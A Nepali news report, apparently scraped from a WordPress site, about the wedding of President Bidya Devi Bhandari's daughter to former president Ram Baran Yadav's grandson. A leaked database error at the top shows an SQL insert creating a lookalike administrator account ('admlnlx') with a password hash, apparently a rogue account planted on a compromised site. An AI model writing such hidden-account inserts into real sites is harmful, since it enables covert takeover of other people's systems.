WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4h/u2XS38NIjXJFY8u0/G8IqC0kGC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 09:57:59', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ३-
सोमबार राष्ट्रपति भवन, शीतलनिवासमा राष्ट्रपति विद्यादेवी भण्डारीज्यूकी कान्छी सुपत्री डा. निशाकुशुम भण्डारीको विवाह भयो। पूर्व राष्ट्रपति रामवरण यादवका नाति अभिषेक यादवसित बिहान १० बजेको शुभ साइतमा स्वयंवर भएको राष्ट्रपति कार्यालयले जनाएको छ।
यादवको साथमा उनका पिता मुनीलाल यादव तथा आमा किरण यादव समेत आफन्तहरुका साथ शीतलनिवास आएका थिए। समारोहमा पूर्वराजा ज्ञानेन्द्र शाह पनि सहभागी भएका थिए। राष्ट्रपति कार्यालयको आधिकारिक विज्ञप्तिमा भने ज्ञानेन्द्रको कुरा समावेश गरिएको छैन।